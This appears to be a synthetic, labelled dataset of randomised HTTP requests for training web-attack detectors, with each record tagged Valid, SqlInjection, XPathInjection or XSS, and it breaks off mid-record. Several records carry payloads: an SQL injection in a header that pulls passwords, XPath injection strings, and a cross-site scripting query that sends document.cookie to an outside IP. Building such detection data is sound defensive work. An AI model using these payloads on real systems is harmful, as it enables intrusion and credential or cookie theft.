UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 496x5279
Via: FTP/1.6 www.eXlher.htm, 7.8 133.53.101.92, 6.2 150.91.19.106
Transfer-Encoding: r8oh
Upgrade: pePaai/6.4, heot/7.3
Warning: 207 www.7yee.shtml "rotcrNusEy3ganeoytl" "Mon, 04 Feb 08 07:34:03 GMT"
X-Forwarded-For: 230.208.82.135
X-Serial-Number: 65434343667649
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

aFAmkHuh=79&Cltbhshir=eweel&h0peari=01868&eolrngo5rihDd2=ho&mgecg=leYe$inidbinsioH&

End - Id: 6885
Start - Id: 15611
class: Valid
GET /7APH35c7UUOjNmeta/6nxO7ps/opt4.4D1Fpasswd.html?inE81=1168 HTTP/1.1
Host: 58.188.200.4
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.6
Cache-Control: max-age=92
Client-ip: 167.185.7.78
Cookie: eeaoocwnl=ioN6h8;vttnmage=dnjieioyndo;hdabY4=%ltt;TcuetirS=2960804;sRtnhtegwtnukm=eaqoSmozian;gugcJk=e
Cookie2: $Version="372"
Date: Wed, 11 Jul 07 06:09:18 GMT
ETag: "@ghp_X9L2Y7OaVZIF"
Expect: rMtet3ay=trlvn
From: egyhr8@dp3Tsste.uk
If-Modified-Since: Mon, 05 Oct 09 02:55:48 UTC
If-Unmodified-Since: Sat, 26 Apr 08 07:39:16 GMT
If-Match: "OuNU2P_8tGojlpx"
If-None-Match: "vhmh6.I@2TZupjED"
If-Range: "TwhkhJCl6xpenYPaZbD_"
Max-Forwards: 18
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: vrynOe rp7b=4e4ltho
Authorization: Digest realm
Range: 265325-,886-,-1
Referer: /is2rD/krnojpc/t4tlcarj/eAlmon.js
TE: trailers,trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/9.5 (X11; U; SunOS sun4u 6.3; sa-T6; rv:8.0.2) Gecko/25161768
UA-CPU: x86
UA-Disp: 4613,6717,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 3825x476
Via: 0.5 www.niTkv.gif, 9.7 116.87.185.152, HTTP/0.6 49.138.135.50
Transfer-Encoding: gzip
Upgrade: wagrj/9.0, xsoib/3.9, oxc/5.1, eEt/3.6, EE0sh/2.7
Warning: 222 www.0iel.jpeg:95 "owrAeinasr5" 
X-Forwarded-For: 112.169.80.103
X-Serial-Number: 42056284732310990
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 15611
Start - Id: 34196
class: Valid
PUT /bfj.tiff? HTTP/1.1
Content-Length: 8
Content-Language: t,umb9o
Content-Encoding: deflate
Content-Location: http://www.agrm.com/nmeom/elacor/KdaSp.asp
Content-MD5: dGJlQm50cmZub2FlbjFldg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 26 Jun 06 23:49:53 GMT
Last-Modified: Tue, 08 Aug 06 21:34:01 GMT
Host: 22.188.150.47
Connection: ceale7t
Accept: */*
Accept-Charset: cp-936
Accept-Encoding: *
Accept-Language: 0sd8-u1ea, ko-n;q=0.0, tatdo7so-rdu;q=0.2
Cache-Control: no-store
Client-ip: 195.30.83.12
Cookie: o0e0eitr7yieleN=nwdg
Cookie2: $Version="0"
Date: Mon, 09 Jan 06 12:48:33 CET
ETag: "ehlGSz.VF..ZXY@"
Expect: btdIas
From: llrradu@4vhsetp.com
If-Modified-Since: Sat, 19 May 07 23:08:56 UTC
If-Unmodified-Since: Mon, 25 Oct 04 12:12:43 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 23 May 09 23:33:14 UTC
Max-Forwards: 813
MIME-Version: 9.2
Pragma: 5m='d'
Proxy-Authorization: Digest username="pcny3"
Authorization: Digest nc=Ce099BCf
Range: 40581-
Referer: http://nlfhCrn.uk/8Uonr/etraed.cgi
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.9 (Windows; U; Win 9x 0.7; aN-io; rv:1.9.8) Gecko/17390128
UA-CPU: x86
UA-Disp: 0739,0435,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 306x913
Via: at8m/0.0 46.25.49.104, 5.4 www.irga.shtml:75429
Transfer-Encoding: etede; hlihjte=dnoite
Upgrade: aNtcT/5.9, fixhhd/4.0, fEpm/8.0, 3nrade/2.4
Warning: 315 www.efceA.jpeg "tyNsjshtyj4wT" "Mon, 11 Sep 06 12:27:52 CET"
X-Forwarded-For: 39.178.242.76
X-Serial-Number: 7747668675736673
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

y39j=rxv

End - Id: 34196
Start - Id: 42721
class: SqlInjection
POST /cAThK8RToj/dydpafitnteih/QX8Kgxx3saPQXTt/ozTG9u_9N3BA/nd9dk3diZ/noEuduo93net/uwhereoWYg.EYAOVhf/8B/cw_xBc/Dumrsntx3a86yf.jpg? HTTP/1.0
Content-Length: 22
Content-Language: ut,ind2m,tuioe
Content-Encoding: identity
Content-MD5: bml1dDVkRmkyZWVoYWJpdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 09 Jan 10 06:07:33 GMT
Last-Modified: Tue, 28 Oct 08 02:55:35 CET
Host: 16.249.196.230
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: ';   begin   declare @ret   varchar(8000)  set    @ret=':'  select  @ret=@ret+' '+Rlhwo+'/'+password  from  naeI  where   emhn1t>@ret     select @ret  as   ret     into    foo     end--
Cache-Control: no-cache
Cookie: NaqaohGld6o=1;4Lhtteec=nytlt;hp;y7seq=4al$hRlhtdtltOt
Cookie2: $Version="1"
Date: Sun, 20 Dec 09 20:19:07 GMT
ETag: "CO6efCdL@zR26C6Ui"
Expect: 100-continue
From: hewua2@ag3wnip.ch
If-Modified-Since: Sun, 08 Aug 04 23:02:48 CET
If-Unmodified-Since: Mon, 04 Sep 06 03:51:03 GMT
If-Match: *
Max-Forwards: 808
MIME-Version: 7.5
Pragma: i=j
Referer: /iwEoedhy/dlnr.jsp
TE: trailers,gzip
User-Agent: Mozilla/2.9 (Windows; U; Windows NT 2.5; t7-Em; rv:3.7.9) Gecko/52908935
UA-CPU: StrongARM
Via: 6.3 183.222.148.48, 9.0 169.241.26.108, 5.6 www.entEnt.png
Upgrade: voFoet/7.8, oRnfo/8.0
X-Serial-Number: 3359493

xgnti=tD&tHsIieRa=5192

End - Id: 42721
Start - Id: 48806
class: XPathInjection
GET /nL_MifMPCNQrjpG/zpC_D.cgi?w2tor7ow=ai&ainami6eeywn2e=3oprd8%27++or+++3%2Fwrekar%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D59%5D+or+++%27tr%27++%3D++%27&sqllxttE=toqCo&nl=ofii&audlsicai8Use3l=a&dyouocA6aocr=106&S3o0=57703&tieb=Ttrms&isPsoRe=rt&awluaei=wn&GaTyrTrxo4e=efeD&OTQsEautoexecV-1FB@=661449&6GtchildEY-Hd1=syooyeus&doahbs=lXF HTTP/1.0
Host: www.nnr8nsnnm.de
Connection: close
Accept: audio/basic;q=0.6, image/png
Accept-Charset: x-mac-korean;q=0.3, x-mac-arabic, iso-8859-15, x-mac-turkish;q=0.0, hz-gb-2312
Accept-Encoding: deflate, identity;q=0.6, gzip;q=0.4
Accept-Language: *;q=0.7
Cache-Control: anrose='rnile'
Client-ip: 215.6.165.172
Cookie: aTs0vrheayngs=edOlLW
Cookie2: $Version="7"
Date: Wed, 29 Jun 05 20:14:53 CET
ETag: W/".EXNWZ0xRZ8f9BV"
Expect: x2larteo
From: 2geofch9@4eke.org
If-Modified-Since: Wed, 31 Mar 10 04:19:28 GMT
If-Unmodified-Since: Mon, 03 May 10 12:59:32 GMT
If-Match: "46Wnu8zuFB0Kz6jfl"
If-None-Match: *
If-Range: *
Max-Forwards: 1517
MIME-Version: 5.2
Pragma: lorn1='aeta5a'
Proxy-Authorization: Digest response="08bA7c67a569BFcBED9f6CeCC1e6B5Cb"
Authorization: Basic bVAzNmxPOmxsaWVz
Range: -77394
Referer: /erent/lryiujdh/mPnoto/eni8e/7ismfjo.jsp
TE: trailers,deflate;q=0.5
Trailer: If-Match
User-Agent: iwecoz/4.0.6
UA-CPU: MIPS
UA-Disp: 065,1900,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 807x856
Via: HTTP/2.0 www.am452.js, FTP/4.4 www.arna.css, 0.3 www.snIea7W.png
Transfer-Encoding: compress
Upgrade: 71emX/6.2, hao/6.3, scEf4/7.0
Warning: 989 42.33.152.171 "ej9c" 
X-Forwarded-For: 29.255.158.60
X-Serial-Number: 9894674694471428
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48806
Start - Id: 1962
class: Valid
GET /1hUvEnO_XbnR.w1FwtZb/4wQNC4A67GO7Iq/l.HKVr@/x0nservices@/a-IiIaodabjGS/hQ9w554a_G90Ih/Nwk3oQrlj0rwEd4o/hrg9QajRoox@BHMWz/eAeewhS8hatdr3elimeq.mdb?35e4oge=859115817&efanudshhNtEnq=15652032&eroP=wlxp_%28oE3%29rcpo&8nutwu=h%5Dea1&ysSets=wawon55rr&rreI=tpQL&2uhhtg=udtPooXmo9xW%29&OAdLdelete=js6tLnhteoh&rhlhza8thse1=51&8NwXsD5=6422&ntoed=nettqkwDInnopv HTTP/1.1
Host: www.hzpi.fr
Connection: keep-alive
Accept: video/quicktime, text/plain, image/jpeg
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 93.59.198.99
Cookie: 8fEt88Qf=4
Cookie2: $Version="43"
Date: Mon, 03 Jul 06 18:04:11 UTC
ETag: "5IM0a8wAua3B.5K8dP"
Expect: 100-continue
From: ebeitt4@hsle.fr
If-Modified-Since: Wed, 04 Mar 09 10:38:29 UTC
If-Unmodified-Since: Wed, 09 Jun 04 12:03:15 GMT
If-Match: *
If-None-Match: "TLu7wZXmpCUcjt1P4E"
If-Range: "e98Pzop5HTDE4r3zKwyI"
Max-Forwards: 6
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: wiohon Esah=2tadyd
Authorization: NTLM ZXNOaXNkZXI4MWFhdHRtYWl2dHNJdG55ZWFpdHFvZXNkNDQzZHVpZFk=
Range: -8044,60-,429850-
Referer: /ndcfdrzh/edqPs/djme/mbhos4o.msf
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: Mozilla/5.6 (Machintosh; U; PPC Mac OS X 3.4; Tk-ad; rv:6.5.1) Gecko/67818306
UA-CPU: Sparc
UA-Disp: 702,657,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 668x278
Via: 0.7 49.245.110.244:9332
Transfer-Encoding: gzip
Upgrade: tsd/0.2, alvm/0.6, iEenc/5.7, nnoc/8.2, rtetzy/1.1
Warning: 109 www.eteoe.js "tetud6bb" "Sat, 05 Aug 06 10:35:13 GMT"
X-Forwarded-For: 218.173.209.61
X-Serial-Number: 539815603365
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 1962
Start - Id: 13437
class: Valid
GET /r1sgMmrgwiQvYO2Xy/r@OEPIcdSI5s3A/9ss7u/tT/dl/tEmetaJXAcdWy/yeuwexc.jpg?rht2DUh=15375737&W4ein5=nulldii7mr+f&ealo=p8Thu&aixemhoot=eeSdswdt&patH=1624&JlogwiRhttpLdH=orone&@f-S@5uyXsAc=+sqia5gst%26i-&asdoihsulde=n29MeiybfME4a8&adb2=udasE HTTP/1.0
Host: www.vtgo.net:3003
Connection: keep-alive
Accept: video/*;q=0.6, audio/basic;q=0.4, image/jpeg
Accept-Charset: gb2312;q=0.6, x-mac-arabic, iso-8859-5;q=0.3, cp-932;q=0.5, iso-8859-15
Accept-Encoding: 
Accept-Language: vimoeE-8hs8te, tb8te-ain;q=0.2, x-306, d1sgtc-t7srAos, ozeRrsyd-ieecAb
Cache-Control: only-if-cached
Client-ip: 148.219.86.208
Cookie: bmh=hO8rey@cvpj;8tmrxtu4b=79885
Cookie2: $Version="548"
Date: Sun, 11 Jul 04 17:45:14 UTC
ETag: W/"cAVI@vuiXnK-wTp8"
Expect: ert7Te=r2qane;oyn2p=eexi
From: un9t@rthc.be
If-Modified-Since: Sat, 03 Jan 09 06:21:55 GMT
If-Unmodified-Since: Sat, 18 Oct 08 12:34:10 GMT
If-Match: *
If-None-Match: "xgxNpojsN-6@GVU"
If-Range: Thu, 12 Aug 04 18:04:27 UTC
Max-Forwards: 96
MIME-Version: 0.5
Pragma: 3e00sqo=tyafSw4b
Proxy-Authorization: NTLM bGFlYXpvOW50b29zOXRhamVhZWVvcmlmU0Fydmh0dFk=
Authorization: NTLM bXBlaHQ4M3BoZWF4ZmVlYnBlN2FhRUUzc250dzUwaWVxZTBycm8ybGlzZjBB
Range: -61196,755-,-603766
Referer: http://Tgehoza.cz/so6r/snna0ee/nnttkeqi.js
TE: gzip;q=0.5,trailers
Trailer: Authorization
User-Agent: ilPikA0Y http://www.pPoxicf.uk
UA-CPU: x86
UA-Disp: 507,141,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 9732x9138
Via: 5.1 www.ath4noed.png, rdi/2.4 www.wiAaxa.html, FTP/1.8 www.o8spVmL.html
Transfer-Encoding: compress
Upgrade: gau/6.0
Warning: 103 www.Heyey.jpg:06 "mienyae" 
X-Forwarded-For: 37.38.29.200
X-Serial-Number: 8913868514720115974
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13437
Start - Id: 32738
class: Valid
POST /oJc7oM.apV/goeerulsso65ltditoe/hvyjvQuOXfOaAB/mk2rUf4b92yfomX/nCNTp_UUx.php? HTTP/1.1
Content-Length: 99
Content-Language: reasr4r,de,bgD1yd
Content-Encoding: gzip
Content-Location: /a0zsfcnd/aehydn.cgi
Content-MD5: ZTBvNGg0d3RqSGxvYmVyZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 22 Jan 06 01:38:43 UTC
Last-Modified: Wed, 25 Feb 04 17:53:43 UTC
Host: www.oll7mertGS.net
Connection: z94lSsr
Accept: video/*, application/postscript;q=0.1, image/png
Accept-Charset: *
Accept-Encoding: *
Accept-Language: teqov9-cHea;q=0.3, n7-eicnuust
Cache-Control: 8drb='i5Tua'
Client-ip: 103.216.102.1
Cookie: ht=aTf1n.vad_ar;jdsu1buod=zsenetlyimelkoi
Cookie2: $Version="215"
Date: Tue, 24 Jan 06 11:55:01 CET
ETag: "jCRRf-05ZKbIhCYEal1u"
Expect: 100-continue
From: ynuuOeYe@e4oe.com
If-Modified-Since: Sun, 27 Mar 05 05:59:10 GMT
If-Unmodified-Since: Wed, 10 Oct 07 08:00:10 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 2.3
Pragma: utar='eaneid5'
Proxy-Authorization: NTLM bTR0ZWlyMnBpYW15ZXR0NWxlcGFoM2VpdDZzYTR1YWlyRXJvc25uaXQ=
Authorization: Digest qop=tetrtl1h
Range: -41512,-04591,6-
Referer: /ihCsv/henobhat/0hnmtg.htm
TE: deflate,trailers,trailers
Trailer: Trailer
User-Agent: 8rltrrn7eelo85
UA-CPU: Sparc
UA-Disp: 2397,8345,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 1032x4856
Via: 2.9 25.171.225.58, FTP/0.4 www.nr73.js
Transfer-Encoding: identity
Upgrade: ndu/3.8
Warning: 192 5.69.98.20 "aslrVau" 
X-Forwarded-For: 140.43.85.187
X-Serial-Number: 16114956793159
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

3oetdgrszoNdm=rPgOb&dservicesneFfA=onSoanexecrd&rwNfortlrrspl=78084&HpFprocessing-instruction=7sess

End - Id: 32738
Start - Id: 48904
class: XPathInjection
GET /esfisnee3ehas/nps/n5wuiF/sPYKKk@satx_Y/l8pUIB/a_00htpassR9zjmgZQC0/DqPs0AlDV0execo.asp?Y5lYwAtj=eQe&sek2d8lvhO=813&ehgo=li-Ogerc4b&ph0oeNaofu=or&mya8onctz=nulln%3Dtopen&5n5fromDAK1E=enIpIemt%5DG&Ir_n@G4_g=NdniI4r+erT&eAnmSlplrihh=0&1tLaHi2t=ohson%27+++++or+++++count%28+path%2Fchild%3A%3Anode%28%29%5Bposition%28++%29%3D%28%28i+%2B++++j+%2B+k+%2B+l%2B+1%29%5D+++++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++or+++%27eri%27++++%3D+++%27++kteiri%27+++or HTTP/1.0
Host: www.Ffress.uk
Connection: keep-alive
Accept: text/xml, audio/*
Accept-Charset: *;q=0.1
Accept-Encoding: deflate;q=0.5, deflate;q=0.2, identity
Accept-Language: oIic-ie;q=0.0, ynmfin6C-wqEta;q=0.0
Cache-Control: only-if-cached
Client-ip: 182.56.240.6
Cookie: rae=enLnode;tnr0aigtaetxcLe=7182;anfdtheL7A='t ;BcbSOlre4roS4i=2900
Cookie2: $Version="0"
Date: Fri, 12 Nov 04 15:03:17 CET
ETag: "WYNhh.HkA-GnzCFmx"
Expect: i5f1t
From: nui8@hgERemx.net
If-Modified-Since: Sat, 03 Jun 06 15:17:23 GMT
If-Unmodified-Since: Wed, 07 Apr 04 05:57:53 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic blRlaDBtazp0eGVrcDBpNg==
Authorization: NTLM ZWhlbWdiaWh0cWh4YWs5ZWVvOWVwcmR0YTBOdHkzZXQ1M2Vjcm9uQ2g4
Range: 87-22
Referer: http://www.ianfna.fr/eygoa/ses3.bin
TE: gzip;q=0.7
Trailer: Warning
User-Agent: Mozilla/8.6 (compatible; Konqueror/6.5; Open BSD i386; nies9m2au; lzvozse)
UA-CPU: MIPS
UA-Disp: 8730,583,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 978x515
Via: fhsl/9.7 163.169.47.177, HTTP/5.4 86.213.52.170:5840
Transfer-Encoding: compress
Upgrade: o6r/8.3, gsh/9.3, o8o/3.8, 2oIojh/2.5
Warning: 099 www.eSitghtc.htm "2nttveexd" "Tue, 21 Sep 04 15:34:20 CET"
X-Forwarded-For: 1.220.148.94
X-Serial-Number: 58510218762
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 48904
Start - Id: 12143
class: Valid
GET /neiljMo/tcesthdce3Ds5/n4s/eiuEeoadthlwmcibt/iZ.u7SEbSIl/yoeltm2/asdor/9ha/te6piigeeteot5me/imjhoy/tC/npPwTSB8w2J.x4I.html? HTTP/1.0
Host: www.peek54t.net
Connection: close
Accept: audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: notsrn='eu'
Client-ip: 198.154.140.114
Cookie: huedox=n
Cookie2: $Version="99"
Date: Wed, 20 May 09 24:08:18 GMT
ETag: W/"QRTugnwI4TSG7q17by"
Expect: aore=HRocTjuo
From: l5eh@uoypar.com
If-Modified-Since: Wed, 18 Nov 09 18:17:59 GMT
If-Unmodified-Since: Sat, 18 Jun 05 20:49:40 GMT
If-Match: *
If-None-Match: "taNmf.ozjg5pRGJmcA0"
If-Range: Sun, 14 Nov 04 23:41:45 CET
Max-Forwards: 2
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: NTLM b2Nmdml5aWNoTmlvYm9vaGlvbm9tYWVsZXZsZm50ZHRvYnlk
Authorization: Basic ejF5Y3NlOjRoaEU=
Range: 442-028,989879-74,-93660
Referer: http://www.iSlt.uk/CttTti/ieetcepe/tnit/dohei/r4dhprnt.dll
TE: gzip;q=0.2
Trailer: If-Range
User-Agent: Mozilla/5.3 (Windows; U; Win98 9.5; tr-jp; rv:0.6.5) Gecko/25811073
UA-CPU: x86
UA-Disp: 908,936,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 438x0789
Via: 3.1 www.btugbyfa.png, 7.5 www.utsziu.css:8302, tzr/2.4 108.32.162.221
Transfer-Encoding: nrdwa; oMre=benaszA
Upgrade: necoeD/4.9
Warning: 045 0.10.164.95:0 "NssOd0mum" 
X-Forwarded-For: 215.199.241.153
X-Serial-Number: 99725023233624761
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12143
Start - Id: 47211
class: XSS
GET /kjjAacr8/nOT.pvPYPQ/aOCDjQrmUnuB/8bmochaZZ@6gbetweenaccess_log-SC/arbUTV/ewTWFwoV2O/syI8bY/enigyrohpoc/im3mb/J-JYOG.jsp?rbaaaa3nslndqit=7bo2trboot.ini&sBteis=352&esepno=tsbmeta&KdZB06xqsam=6420&o8lmtlIheaha=%5B%5CxC0%5D%5B%5CxBC%5Dscript+++%3E%5Bwindow.open%28%27http%3A%2F%2F86.179.91.208%2Fonti.pl%27%2Bdocument.cookie%29%3B%5D%5B%5CxC0%5D%5B%5CxBC%5D%2Fscript++%3E&tsz4=lSrbtFfx8IRG HTTP/1.0
Host: 148.72.89.47
Connection: keep-alive
Accept: application/*, text/*;q=0.0, audio/*;q=0.5
Accept-Charset: windows-1252, euc-kr, iso-8859-4, hz-gb-2312;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: eds5=4s
Client-ip: 220.86.207.11
Cookie: ZLgtelnet_=594649;era=fNd-X;uoes8his0ui4a=ecolaHmU;UJVB6GXL= aeahv
Cookie2: $Version="757"
Date: Thu, 11 Oct 07 05:51:04 UTC
ETag: W/"qBRk224-oxKp_anYp4X"
Expect: dtpt0epr
From: ceqdbn@v02go.fr
If-Modified-Since: Sun, 14 Nov 04 15:15:04 GMT
If-Unmodified-Since: Sat, 26 Jan 08 08:25:07 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 09 Feb 07 19:02:57 GMT
Max-Forwards: 0040
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Basic bW5kZ2VrbmU6dWVja2FoaXA=
Authorization: NTLM c242dHJOdDVzYThpUmVtZ253THJzd2Rpb25oeWdoTm5ybQ==
Range: 8-,46-,-554862
Referer: http://oRlursAq.fr/4reM/retee/scse/eehereg.asp
TE: gzip;q=0.7
Trailer: Cache-Control
User-Agent: Mozilla/0.5 (compatible; MSIE 6.0; Solaris; EUoswo)
UA-CPU: 68000
UA-Disp: 4828,524,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 286x017
Via: 2.6 www.4geu.htm, 1.3 214.63.9.22
Transfer-Encoding: compress
Upgrade: N1Oor/8.3, n55i3l/4.0
Warning: 023 176.209.137.215 "wrgDroclerrobjmfp3o" "Thu, 19 Jun 08 19:41:05 GMT"
X-Forwarded-For: 42.248.51.9
X-Serial-Number: 04739435468972088
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47211
Start - Id: 32942
class: Valid
PUT /wY/IEU3OoF_dbinbxterm9N/sOh6u02YJz/aEKWl/ngrEli/aID4OpgGe3/vsmictsaU/nA-eg-8/7WNjl2pwgO.tiff? HTTP/1.1
Content-Length: 178
Content-Language: oaT,1so,Hen
Content-Encoding: compress
Content-Location: http://www.uramtjd5.be/nrhbs/imytl/ysuiehbe.css
Content-MD5: cnZvamFhOWRpdHJzdGM1cw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 19 Nov 05 13:27:11 CET
Last-Modified: Sun, 16 Oct 05 07:07:10 CET
Host: www.o0ehmrj.com
Connection: oapseSee
Accept: */*
Accept-Charset: big5
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 42.92.131.103
Cookie: io4lo=1046;nsuoi=giseniepel;ic=npoLgvatEsmts;wRcf=aZPoaXp
Cookie2: $Version="7"
Date: Tue, 25 May 04 15:46:36 CET
ETag: W/"DOb9BdBCTy1SOp-1Ll3F"
Expect: w4midakc
From: cpts@U3ei.ch
If-Modified-Since: Fri, 12 Dec 08 08:43:33 UTC
If-Unmodified-Since: Sat, 24 Jun 06 07:56:10 GMT
If-Match: "yhNyzjjMiiPJt5NLYjc"
If-None-Match: *
If-Range: Tue, 28 Jun 05 10:18:35 GMT
Max-Forwards: 403
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: f0icw moaxn9=bpnadt
Authorization: Digest nonce
Range: -5743
Referer: http://esTelZ.de/hredu3it/0oigusw.pdf
TE: chunked;q=0.2,chunked,trailers
Trailer: User-Agent
User-Agent: eEsieyf/8.7.1
UA-CPU: 68000
UA-Disp: 8787,462,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 6323x133
Via: FTP/0.7 www.7aiaoE.jpg, lana/9.5 www.Tecpyd.jpg
Transfer-Encoding: identity
Upgrade: bja5e/7.6
Warning: 969 www.iwaap8th.png "eRetmltiagr" "Fri, 18 May 07 08:22:34 UTC"
X-Forwarded-For: 185.226.175.55
X-Serial-Number: 8256064879987524435
----: --------------------
~~~~~: ~~~~~~~~~~~~~~

OtonltornCs0tw=vacedwehzhemd&cTchildpIE@v=4&ox4mh4fe9o=hu5id&E3i3hn=hobc&a2dgittlsseoln=213139352&iXy8_hD=9129445472&eaihineKoeai=0execo=:i0d&len7b=twiAGXjlKmW&sodattf=454176

End - Id: 32942
Start - Id: 11445
class: Valid
GET /i50qhN/nbvhdrhbaamc6a/aeue6eeas/u41AKmmcfR8ywt-J@w/yxiUrpwzFnohnraanro/tx@TWps9_qmZq-SCbL/1r6VjayVbG/aAxedMfrUd/Xayueabsvbntkt/6i/k4lIT@GtKJVsb6YH@.jpeg?sock_stream_2H=dVFYmb&t2nihtosatsjtav=83252&p8=%25&uhnTiqhete=replacelocationiSrpf%7EeEmi&nfdhtqtetannr=0&ayesohzcotMpmhw=acuik+ueh8o HTTP/1.0
Host: www.mn1paNP.st
Connection: eiciMp7
Accept: image/*;q=0.0, video/mpeg;q=0.5, image/*;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: uzshw-Mnt3nlg;q=0.2
Cache-Control: no-store
Client-ip: 69.208.78.9
Cookie: 9NJtr=hssevulen
Cookie2: $Version="36"
Date: Mon, 21 Apr 08 06:57:24 UTC
ETag: W/"R51MOFyEAdg@_kqyEB"
Expect: totohex=namfajg
From: ezBfko@fesnitr.uk
If-Modified-Since: Tue, 01 Feb 05 15:10:58 UTC
If-Unmodified-Since: Sat, 07 Nov 09 20:03:12 GMT
If-Match: *
If-None-Match: "_syTo@tQKc_7T66"
If-Range: *
Max-Forwards: 6
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic ZWFleTo2cGZpZQ==
Range: 17-873364,-1915
Referer: /aEsh/homeir/Nsoeh/fTehry8E.rar
TE: trailers,trailers
Trailer: From
User-Agent: Mozilla/8.8 (X11; U; SunOS sun4u 2.1; 3H-so; rv:7.0.4) Gecko/33299817
UA-CPU: Sparc
UA-Disp: 9055,045,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 514x0544
Via: 0.4 57.54.245.149:3497
Transfer-Encoding: sIrC; nkubue7=tgFsaRs
Upgrade: elees/2.8
Warning: 370 www.egaerts.html:66201 "udt5tl" 
X-Forwarded-For: 40.167.68.225
X-Serial-Number: 0375108727
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11445
Start - Id: 22165
class: Valid
GET /LX0KL9FsKa/artt/locationm9nlE0ahtaccesGC_@ON/phpdocument5O/QREK/d8O2JasVh4bTQ0s7FTrs.dll?od=dcntieniiztaaxMgo7&iZy_YstylexIT=zWonllew6&irhah=bw5qIyq&hx9ohiNoaes=eLo6%5Dt%27%5Dq&2oSyDhcsfetv1e=iUW9epeYMOFK&s4rosmihv=6s&aa=formwindow.open%28&thA32lgrt8=s9m6dqmyte0asfw263&tbaafetbdopstsa=oS1reiatta+8&K8qgG5rdropLb3=+er&aebrtuSaersaeOD=ydcQ&VVk@FTuconnect=6281399&Jphsk=tio4esMs HTTP/1.1
Host: 229.127.188.182:80
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: oatygat-9;q=0.0
Cache-Control: max-age=04079
Client-ip: 181.212.207.168
Cookie: l46ol4qr30e=3;yciS=bsYlidces8oke94;m9heae3raRiie=hkXZFnjO65D
Cookie2: $Version="7"
Date: Tue, 17 Mar 09 09:37:47 UTC
ETag: W/"NCb_-30WhdXuLYgMiq"
Expect: 100-continue
From: wiKeelga@iawciImato.be
If-Modified-Since: Sun, 23 Mar 08 03:26:58 GMT
If-Unmodified-Since: Tue, 08 Aug 06 18:02:42 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 15 Oct 06 15:25:53 CET
Max-Forwards: 0308
MIME-Version: 1.6
Pragma: k=ya
Proxy-Authorization: frls dscr=zajryd
Authorization: Digest response="A8Eaf4A60c56a80BEecEB037A1Cc5b04"
Range: -8,26857-
Referer: http://www.mt4enetr.biz/eoymX/87rHo/lesl/l2Ai1.png
TE: trailers,gzip,deflate;q=0.8
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.0 (Machintosh; U; PPC Mac OS X 3.1; xt-3d; rv:4.6.3) Gecko/38027384
UA-CPU: x86
UA-Disp: 863,374,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 850x114
Via: 5.0 www.oaeo1eb.jpeg
Transfer-Encoding: xnn8u; titbj=ni1so7b
Upgrade: rnlh/4.1
